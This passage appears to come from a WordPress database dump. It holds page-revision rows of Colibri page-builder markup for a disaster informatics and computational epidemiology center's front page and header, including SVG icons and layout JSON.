h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c10\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Data reconciliation, consolidation, and distribution to support research in disaster informatics, disease modeling, and spatial epidemiology</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n        <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c14\">\n                <!---->\n                <!---->\n                <h5 class=\"\">population disparities</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Enable the development of inclusive public health and disaster preparedness efforts&nbsp;that overcome place- and context-specific access disparities&nbsp;</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 18:26:09','2022-02-16 18:26:09','',20,'https://gsudice.dataconn.net/?p=382',0,'revision','',0),(383,1,'2022-02-16 18:26:09','2022-02-16 18:26:09','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 18:26:09','2022-02-16 18:26:09','',23,'https://gsudice.dataconn.net/?p=383',0,'revision','',0),(384,1,'2022-02-16 18:26:09','2022-02-16 18:26:09','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path 